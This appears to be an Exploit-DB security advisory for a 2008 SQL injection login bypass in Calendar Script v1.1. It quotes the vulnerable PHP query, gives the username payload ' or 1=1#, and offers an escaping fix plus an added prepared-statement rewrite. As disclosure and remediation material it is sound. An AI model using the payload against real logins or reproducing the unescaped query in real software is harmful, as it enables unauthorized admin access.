Vendor: Calendar Script
Author: athos
CVSS: 7.5 (HIGH)
Title: Admin Login Bypass
CWE: 89
Product Name: Calendar Script
Affected Version From: v1.1
Affected Version To: v1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:hotscripts:calendar_script_v1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Calendar Script v1.1 Admin Login Bypass Vulnerability

A vulnerability exists in Calendar Script v1.1 that allows an attacker to bypass authentication and gain access to the admin panel. The application does not sanitize user-supplied input to the 'username' parameter when handling the 'login' action, and interpolates it directly into the SQL login query. An attacker can exploit this by supplying a 'username' value of ' or 1=1# together with any value for the 'password' parameter: the leading quote closes the string literal and the # comments out the remainder of the query, including the password check.

Mitigation:

The application should properly sanitize user-supplied input to the 'username' parameter when handling the 'login' action.
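As an added example (not code from the advisory or from the Calendar Script project), the login handler quoted below rewritten with a mysqli prepared statement, which is the standard fix; the advisory's own mysql_real_escape_string() fix also works but depends on the connection charset being set and on the ext/mysql extension, which was removed in PHP 7. It assumes $conn is an open mysqli connection and a user table with id, username and password (sha1 hex) columns, matching the query in the advisory.

```php
<?php
// Added example: hardened login for the index.php 'login' action.
// Assumes $conn is an open mysqli connection (not the old mysql link) and
// the same `user` table the advisory's query reads from.

function login(mysqli $conn, string $username, string $password): ?int
{
    // stripslashes() from the original is not needed: it only undid
    // magic_quotes_gpc, which modern PHP no longer has.
    $username = trim($username);
    $password = trim($password);
    if ($username === '' || $password === '') {
        return null; // same empty-input check as the original code
    }
    // Same sha1 scheme as the original so the existing table keeps working;
    // new deployments should use password_hash()/password_verify() instead.
    $hash = sha1($password);

    // Placeholders keep the values out of the SQL text, so a username such
    // as  ' or 1=1#  is compared literally and can never alter the query.
    $stmt = $conn->prepare(
        'SELECT id FROM user WHERE username = ? AND password = ? LIMIT 1'
    );
    $stmt->bind_param('ss', $username, $hash);
    $stmt->execute();
    $stmt->bind_result($id);
    $found = $stmt->fetch();
    $stmt->close();

    return $found ? (int) $id : null;
}

// Usage in place of the original switch branch on $_POST['action']:
if (($_POST['action'] ?? '') === 'login') {
    $id = login($conn, $_POST['username'] ?? '', $_POST['password'] ?? '');
    $loginMsg = $id === null ? 'Invalid username or password' : '';
}
```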
Source (Exploit-DB raw data):

 -----------------------------------------------------
 Calendar Script v1.1 Admin Login Bypass Vulnerability
 -----------------------------------------------------
 by athos - staker[at]hotmail[dot]it
 http://www.hotscripts.com/jump.php?listing_id=71365&jump_type=1

 File Vuln "index.php" (code details)

 ------------------------------------------------------------

 <?php
 // excerpt from index.php; $conn is the MySQL link opened earlier in the file
 $action = $_POST['action'];

 switch($action) {
     case 'login':
         // login
         $username = stripslashes(trim($_POST['username']));
         $password = sha1(stripslashes(trim($_POST['password'])));

         if(empty($username) || empty($password)) {
             // Stop, someone tried entering nothing into here
             // Show an error.
             $loginMsg = 'You must enter a username and password';
         } else {
             // The input seems to be ok, check it against the database.
             // $username is interpolated unescaped into the SQL string (the bug)
             $checkDetails = mysql_query("SELECT id FROM user WHERE username='$username' AND password='$password' LIMIT 1", $conn);
         }
         break;
 }

 ------------------------------------------------------------

 Exploit

 http://[host]/[path]/index.php

 (Login) Username: ' or 1=1# & Password: anything

 ------------------------------------------------------------

 Fix: $username = mysql_real_escape_string($_POST['username']);

 Note: works regardless php.ini settings (str0ke =D)
       don't add me on msn messenger

 ------------------------------------------------------------

# milw0rm.com [2008-12-22]